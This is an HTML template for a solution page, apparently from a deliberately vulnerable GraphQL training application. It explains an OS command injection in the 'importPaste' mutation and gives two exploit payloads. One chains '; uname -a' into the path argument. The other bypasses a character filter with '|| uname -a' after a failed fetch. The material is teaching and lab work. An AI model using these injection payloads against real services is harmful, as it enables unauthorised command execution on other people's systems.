{% extends 'partials/solutions/solution_base.html' %}
<!-- Start -->
{% block title %}Code Execution :: OS Command Injection #1{% endblock %}

{% block body %}
  <p>
    The mutation <code>importPaste</code> allows escaping from the parameters and introduce a UNIX command by chaining
    commands. The GraphQL resolver does not sufficiently validate the input, and passes it directly
    into <code>cURL</code>.
  </p>
{% endblock %}

{% block resources %}
  <li>
    <a href="https://owasp.org/www-community/attacks/Command_Injection" target="_blank">
      <i class="fa fa-newspaper"></i> OWASP - Command Injection
    </a>
  </li>
{% endblock %}

{% block exploits %}
  <pre class="bash">
    # Beginner mode

    # Import Paste allows specifying UNIX characters to break out of the URL provided to importPaste, using characters such as ";" "&&", "||", and more.
    mutation  {
      importPaste(host:'localhost', port:80, path:"/ ; uname -a", scheme:"http"){
        result
      }
    }

    # Expert mode

    # Import Paste filters characters such as ";" and "&" but not "|", if you manage to cause the import to fail, you can double pipe it to a command that will execute in the context of the operating system.
    mutation {
      importPaste(host:"hostthatdoesnotexist.com", port:80, path:"/ || uname -a", scheme:"http") {
        result
      }
    }
  </pre>
{% endblock %}
<!-- End -->